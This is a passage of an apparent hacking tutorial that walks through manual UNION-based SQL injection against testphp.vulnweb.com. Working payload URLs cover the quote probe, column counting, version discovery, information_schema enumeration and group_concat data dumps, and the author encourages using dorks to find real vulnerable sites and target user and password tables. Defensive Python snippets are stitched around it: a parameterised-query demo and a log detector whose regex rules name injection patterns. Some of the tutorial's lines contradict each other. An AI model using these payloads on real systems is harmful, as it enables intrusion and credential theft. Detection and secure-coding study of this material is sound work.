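    if strict and not re.fullmatch(r"[0-9]{1,9}", prod_id):
        raise ValueError("prodID must be a non-negative integer")
    sql = "SELECT id, name, price FROM products WHERE id = ?"
    return db.execute(sql, (prod_id,)).fetchall()

def outcome(fn, db, value, **kw):
    # Return the rows, or the name of the exception the web layer would have
    # to catch and turn into a generic error page (never echo it to the user).
    try:
        return fn(db, value, **kw)
    except (sqlite3.Error, ValueError) as exc:
        return type(exc).__name__

if __name__ == "__main__":
    db = make_db()
    for value in ["25", "'", "25 order by 3", "25 order by 4", "-1 union select 1,2,3"]:
        print(repr(value),
              outcome(lookup_vulnerable, db, value),
              outcome(lookup_safe, db, value),
              outcome(lookup_safe, db, value, strict=False))
```

With strict=False the bound query still returns no rows for the injected strings, which shows that parameter binding alone closes the hole; the integer check is defence in depth.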


Unification


From here on, the things will get tough if you are not able to follow what I'm doing. So, we will unify under a single website. This website is intentionally vulnerable to SQL injection, and will prove highly useful since we will be doing the same thing. The purpose of introducing this site at a later stage was to give you an idea how to find vulnerable sites yourself and also find the vulnerable columns. This is what will prove useful in real life. However, to make what follows comparatively easier, we all will now hack the same website. The website is


The actual vulnerability is here


Notice that the URL has the structure that you now know well. If used properly, a Google dork could have led us to this site as well. Now we will replace the 1 with an apostrophe (').




This is what your vulnerable page looks like to start with










As you can guess, it is vulnerable to SQL injection attack

Now we need to find the number of columns.









10 columns. Nothing so far.










12 columns. Error....

So there was an error on the 12th column. This means there were 11 columns in total. So to find the vulnerable column, we have to execute:
http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11

This does not return any error. As I said before, adding a minus sign (-) after = and before 1 will help.
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11










Now we can see a total of four numbers on the page: 11, 7, 2 and 9. It won't be hard to figure out which of them depicts the vulnerable column.

You can take a look at the page http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11 (no minus sign, that is). Now scroll down to the bottom. You will see this:

Comparing the pic with and without the error, we can easily say that the unexpected element in the malfunctioned page is the number 11. We can conclude that the 11th column is the vulnerable one. This kind of deduction makes hacking very interesting and reminds you it's more about logic and creativity than it's about learning up useless code.
Now we are finally back where we left off before we changed our stream. We need to find the SQL version. It can sometimes be very tricky. But let's hope it's not in this case.
Now take the code that told you about the vulnerable column and replace the vulnerable column (i.e. 11) with @@version. The URL will look like this:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version

Now finally you'll see something like

The server is using SQL version 5.1.69, most probably MySQL (pretty common). Also we know the OS is Ubuntu.
Now, about the thing I said about it being tricky sometimes: sometimes the server does not understand the @@version command directly and you need to convert it. You will need to replace @@version with convert(@@version using latin1) or unhex(hex(@@version)).
Now the information gathering part is complete. We have to move to the actual download of tables. Just write down all you know about their database, table and server. You must have a real sense of accomplishment if you have followed the tutorial so far. The boring part always requires maximum motivation and determination.

Extracting tables from SQL database



Now the method to extract data is different depending on the version. Luckily it's easier for version 5, and that's what you'll come across most of the time, as is the case this time. All the data regarding the structure of the tables is present in the information schema. This is what we're gonna look at first.

In the query which we used to find vulnerable columns (i.e. testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11), we will replace the vulnerable column with table_name and append +from+information_schema.tables. The final URL will be

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables


As you can see, the name of the table is character_sets. However, this is just one table. We can replace table_name with group_concat(table_name) to get all tables:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables


We now have the names of all the tables. Here it is - CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,ENGINES,
EVENTS,FILES,GLOBAL_STATUS,GLOBAL_VARIABLES,KEY_COLUMN_USAGE,PARTITIONS,PLUGINS,PROCESSLIST,PROFILING,
REFERENTIAL_CONSTRAINTS,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,SESSION_STATUS,SESSION_VARIABLES,STATISTICS,
TABLES,TABLE_CONSTRAINTS,TABLE_PRIVIL
As you see, the ending of the last table is incomplete. To correct this, you can modify the end of the url to something like +from+information_schema.tables+where+table_schema=database()

Obtaining columns


It is similar to obtaining tables, other than the fact that we will use information_schema.columns instead of information_schema.tables, and get multiple columns instead of just one using the same group_concat. We will also have to specify which table to use, in hex. We will use the table events (I've highlighted it above too). In hex its code is 4556454e5453 (you can use a text to hex convertor; also prefix the code with 0x before entering it). The final code will be:

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453










We now know the columns of the table events

Extracting data from columns


We will follow the same pattern as we did so far. We had replaced the vulnerable column (i.e. 11) with table_name first, and then column_name. Now we will replace it with the column we want to obtain data from. Let's assume we want the data from the first column in the above pic, i.e. event_catalog. We will enter the following URL:

http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,EVENT_CATALOG+from+information_schema.EVENTS










The page didn't display properly; this means that our query was fine. The lack of any data is due to the fact that the table was actually empty. We have to work with some other table now. Don't let this failure demotivate you.

However, our luck has finally betrayed us, and all this time we have been wasting our time on an empty table. So we'll have to look at some other table now, and then look at what columns that table has. So, I looked at the first table in the list, CHARACTER_SETS, and the first column, CHARACTER_SET_NAME. Now finally we have the final code as:
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS










This table has a lot of data, and we have all the character_sets name.

So finally now you have data from the CHARACTER_SET_NAME column of the CHARACTER_SETS table. In a similar manner you can go through other tables and columns. It will definitely be more interesting to look through a table whose name sounds like 'USERS' and whose columns have names like 'USERNAME' and 'PASSWORD'. I will show you how to organize results in a slightly better way and display multiple columns at once. This query will return the data from 4 columns, separated by a colon (:) whose hex code is 0x3a.
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS


Finally you have successfully conducted an SQL injection attack in the hardest possible way without using any tools at all. We will soon be discussing some tools which make the whole process a whole lot easier. However, it is pointless to use tools if you don't know what they actually do.
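The request sequence in this walkthrough (apostrophe, order by N, union select, @@version, information_schema) leaves a recognisable trail in web server access logs. The following detection sketch is an added example, not part of the original post; the log lines are constructed samples in common log format, and the rule names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Probe shapes from the walkthrough, matched against decoded parameter values.
RULES = [
    ("quote_probe", re.compile(r"^-?\d*'$")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+\b", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\b", re.I)),
    ("version_probe", re.compile(r"@@version", re.I)),
]
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Constructed access-log lines (documentation IP ranges).
SAMPLE = [
    '203.0.113.7 - - [24/Jul/2014:10:00:01 +0000] "GET /products.php?prodID=25 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [24/Jul/2014:10:00:09 +0000] "GET /products.php?prodID=%27 HTTP/1.1" 500 310',
    '203.0.113.7 - - [24/Jul/2014:10:00:15 +0000] "GET /products.php?prodID=25+order+by+6 HTTP/1.1" 500 310',
    '203.0.113.7 - - [24/Jul/2014:10:00:31 +0000] "GET /products.php?prodID=-25+union+select+1,2,3,4,5 HTTP/1.1" 200 5300',
    '198.51.100.4 - - [24/Jul/2014:10:01:02 +0000] "GET /search.php?q=union+station+select+seats HTTP/1.1" 200 900',
]

def classify(line):
    """Return (client_ip, status, [rule names]) for a suspicious request, else None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    ip, target, status = m.groups()
    hits = set()
    # parse_qsl percent-decodes values and turns '+' into a space.
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        hits.update(name for name, rx in RULES if rx.search(value))
    return (ip, int(status), sorted(hits)) if hits else None

def summarize(lines):
    """Group matched rule names by client so a multi-step probe stands out."""
    by_ip = {}
    for line in lines:
        hit = classify(line)
        if hit:
            by_ip.setdefault(hit[0], set()).update(hit[2])
    return {ip: sorted(names) for ip, names in by_ip.items()}

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

A single client that triggers several of these rules within a short window, especially with 500 responses in between, is a stronger signal than any one match on its own.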
